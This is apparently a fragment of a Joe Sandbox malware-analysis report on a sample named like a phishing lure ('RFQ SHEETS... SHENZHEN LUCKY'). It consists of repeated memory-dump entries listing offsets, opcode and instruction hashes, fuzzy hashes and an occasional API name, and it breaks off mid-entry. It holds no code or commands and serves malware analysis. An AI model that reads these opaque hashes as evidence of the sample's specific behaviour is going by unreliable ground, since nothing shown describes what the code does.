• String ID:
• API String ID: 947044025-0
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 080AEFB5
Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: 4'^q
• API String ID: 0-1614139903
Strings
Memory Dump Source
• Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: PH^q
• API String ID: 0-2549759414
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: PH^q
                                                                                                                                                                                                • API String ID: 0-2549759414
                                                                                                                                                                                                • Opcode ID: 51f41cb968a7696b6e90002ab7d75aad5d9c34f983ddca6b0219f58d0696b11e
                                                                                                                                                                                                • Instruction ID: 3907920276b04825912cfa6c770a96bf7eebaf16b94eb904e2bcbcac079e7890
                                                                                                                                                                                                • Opcode Fuzzy Hash: 51f41cb968a7696b6e90002ab7d75aad5d9c34f983ddca6b0219f58d0696b11e
                                                                                                                                                                                                • Instruction Fuzzy Hash: B3512330A102448FC755DF28C898A9A7BF5AF4A319B1545A9E416EF3B2DB35DC81CB50
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: (o^q
                                                                                                                                                                                                • API String ID: 0-74704288
                                                                                                                                                                                                • Opcode ID: 283794c90808437a14f2395ad30c5f9f854decd08de9b1de66a33afa29031c10
                                                                                                                                                                                                • Instruction ID: d9f32254defbbedf18cd09e279760da3ba65019dd526b2dcf28467836d36e09c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 283794c90808437a14f2395ad30c5f9f854decd08de9b1de66a33afa29031c10
                                                                                                                                                                                                • Instruction Fuzzy Hash: E84103317042549FCB159B78D8146AEBBE2BFCD620F1481ADE616DB391CF319C02CB91
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 4'^q
                                                                                                                                                                                                • API String ID: 0-1614139903
                                                                                                                                                                                                • Opcode ID: 9834437017bab753156e46fa617cb4badaace39b5726e5e19b6454d8fc73720c
                                                                                                                                                                                                • Instruction ID: bdbcd504c979c4548165181de4634c19fc819de021e0884a9e26f485603dbc93
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9834437017bab753156e46fa617cb4badaace39b5726e5e19b6454d8fc73720c
                                                                                                                                                                                                • Instruction Fuzzy Hash: DA414974600165DFCB15CF28D858AAABBB5BF48314F1540A9EA06CB3B1C735DD82CBA1
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: ,hS
                                                                                                                                                                                                • API String ID: 0-2437973879
                                                                                                                                                                                                • Opcode ID: ed392e45b71fb4a968861e681a9344ae2d914981b2ee57cdc1fa94343a8b3e26
                                                                                                                                                                                                • Instruction ID: 20a04c1390e769dae8f5ebf8fc312aecded25721e8a9c8b08eb084066d81df95
                                                                                                                                                                                                • Opcode Fuzzy Hash: ed392e45b71fb4a968861e681a9344ae2d914981b2ee57cdc1fa94343a8b3e26
                                                                                                                                                                                                • Instruction Fuzzy Hash: 81D012322001089E4F80EAA5E840EA677DDBB14710700C472E508C7521EB22E665EB52
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 967460b3840b8087db00ca11ce9674b2b8ce88c5702fde3b9f5bbaf08c2b02e3
                                                                                                                                                                                                • Instruction ID: d7b51107fc3811e4f36742feaa3aa067b4a3653bf421179c9a74458043d6eab1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 967460b3840b8087db00ca11ce9674b2b8ce88c5702fde3b9f5bbaf08c2b02e3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B32D174D05218CBDB14EF69EA886ACBBB1FF4A300F4154E9D089A7251DB305EE9CF45
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 6c4bf72befd0dbc0ae8e22781fe81b90548a79de171e143e7c7fe4780ed54a99
                                                                                                                                                                                                • Instruction ID: ea71b689be13eae08d8a1d71ea3797ac6246f62b7caa4340b4ce42b84df08672
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c4bf72befd0dbc0ae8e22781fe81b90548a79de171e143e7c7fe4780ed54a99
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9732E270905228CFCB24EF69E9886ACBBB1FF49301F5054E9D088A7254DB359EE8CF55
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 2a56cbb51409cd5accfcdf5887e94b45fb0d00e197060ce88bb7af87cb39a788
                                                                                                                                                                                                • Instruction ID: d06e7eb267b0f1d0b85ae79334d0cd850d30cdd2890b52e68c0b3a495b0536ad
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a56cbb51409cd5accfcdf5887e94b45fb0d00e197060ce88bb7af87cb39a788
                                                                                                                                                                                                • Instruction Fuzzy Hash: BD221270D05628CBCB24EF69E98869CBBB1FF4A300F4054E9D089A7254DB315EE9CF56
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 7fcfe0512b5e3574b5f1d7d5a103c25307750a30981c111a8fa4a519f1e3b7e4
                                                                                                                                                                                                • Instruction ID: c540f28013cf3feaee92680a456dc8aa7acd8fa9ee61243aa38f183fc24f27da
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7fcfe0512b5e3574b5f1d7d5a103c25307750a30981c111a8fa4a519f1e3b7e4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3922D074D05228CFCB64EF68E98869DBBB0FF4A301F4055EAD489A3251DB305E99CF45
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 1364305f1a986db328afd8ed8def2b380e8eeed2a087bd47eb3de3160d8683c3
                                                                                                                                                                                                • Instruction ID: 0a1f7def9832579575f89bd5d0fab7e2a564fb595fff5a7b90d5f146f468352a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1364305f1a986db328afd8ed8def2b380e8eeed2a087bd47eb3de3160d8683c3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 96220F70D05628CBDB64EF68E998ADCBBB1FF4A300F5054E9C088A7254DB355EA8CF45
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Instruction Fuzzy Hash: C45129707107048FD7A4DF28D888B6A77EAFF84715F508869E15ACF261CE71E886CB41
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 1dcd9005c3a054204907b397ea9879c12882bd60e4c18586d8bbf9e4436e0bfc
                                                                                                                                                                                                • Instruction ID: 89c0e99a5f5fe2b9970059aacf8ce496ae9e500e0d21b9897c1f4cd5e8ab4390
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1dcd9005c3a054204907b397ea9879c12882bd60e4c18586d8bbf9e4436e0bfc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 12417B30D09648CFCB05EFB8E9585ECBFB1FF46300F1590AAD088A7266DB35486ACB55
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: df425b6e98bc8069e87c98dcb4a1a0fddb84fd36db578fd743ef594d1f484143
                                                                                                                                                                                                • Instruction ID: 16b569fd7beefe4abed29de7b0b518cb1ddfc8cb17f2769179163977042eea2e
                                                                                                                                                                                                • Opcode Fuzzy Hash: df425b6e98bc8069e87c98dcb4a1a0fddb84fd36db578fd743ef594d1f484143
                                                                                                                                                                                                • Instruction Fuzzy Hash: B041AC71A00218DFDB29CF68C944BAAFBF1FF48310F10846AE5599B262E774E946CB50
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 1fa8c15752d4e4040022be34e109bab2b0a4904999ecaa2216ce15a158613343
                                                                                                                                                                                                • Instruction ID: a316ac964d72017a6a6ce5f5c29aa3ee325efe0d6a406ac7f3fcaceb4e92becd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1fa8c15752d4e4040022be34e109bab2b0a4904999ecaa2216ce15a158613343
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D319F31700A108FDBA4EF38D85862D7BE6BF89610B14466DE55ACB3A4DF34DE02CB95
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: fcb78fbacf553ed277149f398e4148030ae9631b8d1248aff65e8e5fd18d4abd
                                                                                                                                                                                                • Instruction ID: 2029211feefe13aaaaf7d45fa5eee48bac0ae01411c47b467ac27f91a1860a1d
                                                                                                                                                                                                • Opcode Fuzzy Hash: fcb78fbacf553ed277149f398e4148030ae9631b8d1248aff65e8e5fd18d4abd
                                                                                                                                                                                                • Instruction Fuzzy Hash: C6313B71B002159FCB54DF68C844A6DBBBAFF48720F114669E625CB2B1CB71DD41CB90
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: fe2279c652766ea11a9601d125cf4355c0ee1951f776dab2aedf4b81c47afea0
                                                                                                                                                                                                • Instruction ID: f008d66b3800a367e4456195e3ec658d0f9683e47753a262108c95ce91bd15cc
                                                                                                                                                                                                • Opcode Fuzzy Hash: fe2279c652766ea11a9601d125cf4355c0ee1951f776dab2aedf4b81c47afea0
                                                                                                                                                                                                • Instruction Fuzzy Hash: BC316F3170421A9FDB159F69D8446AFBBB2FB98710F00812DF9058B354DB79CCA2DB91
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 76045c660a909798664449e29aaf1922f7060044f0b23f07c7fa820f35520c0b
                                                                                                                                                                                                • Instruction ID: 470ffc28ed9d576f47a660795bfc455e8431bbaf19e6050518e2e30268b1b9ca
                                                                                                                                                                                                • Opcode Fuzzy Hash: 76045c660a909798664449e29aaf1922f7060044f0b23f07c7fa820f35520c0b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D311B71B002159FCB54DF68C844A6DBBB6FF48720B114669E625DB3B1CB71DD41CB90
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 2f43101033ad29470645b7f6fbcecd17fb07b8cc3802079a8bf1cde948950f32
                                                                                                                                                                                                • Instruction ID: 6cf509a85606e74a7b924d8ec366619c3fda9c03989daa67caab913d5cec8b5d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f43101033ad29470645b7f6fbcecd17fb07b8cc3802079a8bf1cde948950f32
                                                                                                                                                                                                • Instruction Fuzzy Hash: 78317A30D09248DFDB04EFB8E9495ACBFB0FF46310F1594AAE084B7262DB7459A9CB51
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: b5719ad45dea3885d233e9b254b155cdd05789cb8357c7d2b93e7fa394a23685
                                                                                                                                                                                                • Instruction ID: 67d50be87afd0f1e61666a984ba97626f0c8664e9fcf6b57699b84cd5cb7e351
                                                                                                                                                                                                • Opcode Fuzzy Hash: b5719ad45dea3885d233e9b254b155cdd05789cb8357c7d2b93e7fa394a23685
                                                                                                                                                                                                • Instruction Fuzzy Hash: FC41E0706006148FCB54DF28C988E997BF5FF88315F2185A9E54ACB276DA30EC49CBA0
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: dc671994d80f0f1c81565c6ff06d3eed1f439522b8f4e17eaeab48801d3e9f50
                                                                                                                                                                                                • Instruction ID: e90a9d7a5b036b93d40f13cd980aa37c99e6c5708576088719474a62f4a93faf
                                                                                                                                                                                                • Opcode Fuzzy Hash: dc671994d80f0f1c81565c6ff06d3eed1f439522b8f4e17eaeab48801d3e9f50
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E31263160D3A69FE7069F28D8502DB7FB1EF55210F0441AEE4448B252D638CC96CB92
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3fb822a56b5174d881ff17acbc8ccf6cfd45b9df51a58653380f5351cf491fef
• Instruction ID: 32d2448479e8e18984cc8f46368efe6fb7314deb5f98fe54cb8d74ec495303aa
• Opcode Fuzzy Hash: 3fb822a56b5174d881ff17acbc8ccf6cfd45b9df51a58653380f5351cf491fef
• Instruction Fuzzy Hash: 8F21F4313042304FEB265739C45837EBB97AFC5618F5C80B9D60ACB396EA65CC439781
Memory Dump Source
• Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 400b996e59e5e85a00d370df436cd53a13c154ce368447d3dc6b0aace03a1bbb
• Instruction ID: f648aa637b9eb642de3db9b1db50fa312f11adc6125bc16ffe96e1b4b533a112
• Opcode Fuzzy Hash: 400b996e59e5e85a00d370df436cd53a13c154ce368447d3dc6b0aace03a1bbb
• Instruction Fuzzy Hash: 9E21F735B056619FC7259B29D45492BFBE2BF8A65070840BFF906CB355CE30DC038791
Memory Dump Source
• Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 19aa68b27e2675ea5b61f2ae87ce95507690f82446f0466bfee95cdc30e47405
• Instruction ID: 27e87f5aaa8967a0cdb96bd6fcc3e5dd4296871c8e0142010671dd69112fbe8f
• Opcode Fuzzy Hash: 19aa68b27e2675ea5b61f2ae87ce95507690f82446f0466bfee95cdc30e47405
• Instruction Fuzzy Hash: 41317270A005158FCB04DF6CC8849AEFBF7BF88710F198559E6199B3A5CB359C02CB91
Memory Dump Source
• Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ee193855943bbe6c6e5857394d8a6554b14de82bfc882549e2451cd3adb80b86
• Instruction ID: 9d3ae9c2db3184e75c4a8c25a488f662a294bcec2da84342e34fe6a233fa263f
• Opcode Fuzzy Hash: ee193855943bbe6c6e5857394d8a6554b14de82bfc882549e2451cd3adb80b86
• Instruction Fuzzy Hash: 6C214134B102194B9BD56B399C2423E66EB9BC5656708442ADB0BCF394EF35CCC2CB96
Memory Dump Source
• Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f486d9e023414c8c3143e1547b722543b0ad61e755555fcc8d25bcc1b63e13ff
• Instruction ID: 8645f80c0712ecfd3350262fd480ad08cdce0ae34dbe6aaf8fbac6d1050e43da
• Opcode Fuzzy Hash: f486d9e023414c8c3143e1547b722543b0ad61e755555fcc8d25bcc1b63e13ff
• Instruction Fuzzy Hash: 9E312570E05108EFDB04EFA9E9885ACBFB1FF49300F5198A9E084B7211DB7059A8CB55
Memory Dump Source
• Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6866b1b7db325d16f7e3a890037a38e0bf55ca028dc0d1e2d452e7b90fc5b89c
• Instruction ID: 429388e54a735ac7c45c86e013bc109ec587ac73976256eb9f2c3fa1de65665b
• Opcode Fuzzy Hash: 6866b1b7db325d16f7e3a890037a38e0bf55ca028dc0d1e2d452e7b90fc5b89c
• Instruction Fuzzy Hash: 9B31E734A002088FDB94DF68C844AAEBBF6AF89311F144468D906EB2A1DB31DD82CF51
Memory Dump Source
• Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 94565ebee425d9bc0ef2b476439dfa599b7816cd75955fe9d65d5ad4889119d3
• Instruction ID: 1af1bab857140722cce16805444e036e2e871904b271455e6311890834785b2e
• Opcode Fuzzy Hash: 94565ebee425d9bc0ef2b476439dfa599b7816cd75955fe9d65d5ad4889119d3
• Instruction Fuzzy Hash: 96312C7090421D8FDF45DFE9C8A15EEBBB2FF88300F10856AD112AB265DA355E49CB91
Memory Dump Source
• Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a4a523acdea2d13da9e97c7bf933294f9bebcfffa4e607c38541e7a343be7707
• Instruction ID: 9d593d0282d6f7b909573b8cad75406d22bfcb016e80bee2d9b3a86d566709a9
• Opcode Fuzzy Hash: a4a523acdea2d13da9e97c7bf933294f9bebcfffa4e607c38541e7a343be7707
• Instruction Fuzzy Hash: B521A130200709CFCB65DE39D8608BE77F9FF823057104A6DE5668E290DB36D996CB91
Memory Dump Source
• Source File: 00000000.00000002.2462522215.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_144d000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d672e0d8348a7a0d4f2de67ff16e332cb19ec19ae4aa0be38de1c9761bf71b28
• Instruction ID: 33473052e8b8e460300c39521c1e43dea832347dd4bcae165d7da228ba0cb3d0
• Opcode Fuzzy Hash: d672e0d8348a7a0d4f2de67ff16e332cb19ec19ae4aa0be38de1c9761bf71b28
• Instruction Fuzzy Hash: A821F1B1A04240DFEB05DF58D8C4B27BF66FBA4324F24C56AED0A0A366C336D416C6A1
Memory Dump Source
• Source File: 00000000.00000002.2462566823.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_145d000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5c5af336c4e111aec971674cf34b9a0a79d20def7e02a7bb6c89a9357ddb07f3
• Instruction ID: b191ea8fbd12ed56f925f7c4124f2580bf71ff18b066f61870d078cd7d28d559
• Opcode Fuzzy Hash: 5c5af336c4e111aec971674cf34b9a0a79d20def7e02a7bb6c89a9357ddb07f3
• Instruction Fuzzy Hash: 8C21D6719042009FDB45DF54D9C4B16BBA5FF84324F24C56EED094B363C736D446CA61
Memory Dump Source
• Source File: 00000000.00000002.2462566823.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_145d000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f21a519627470e3e30b28f04bc77abd1cf64f4b6f147297c151c4bf4c89abf1f
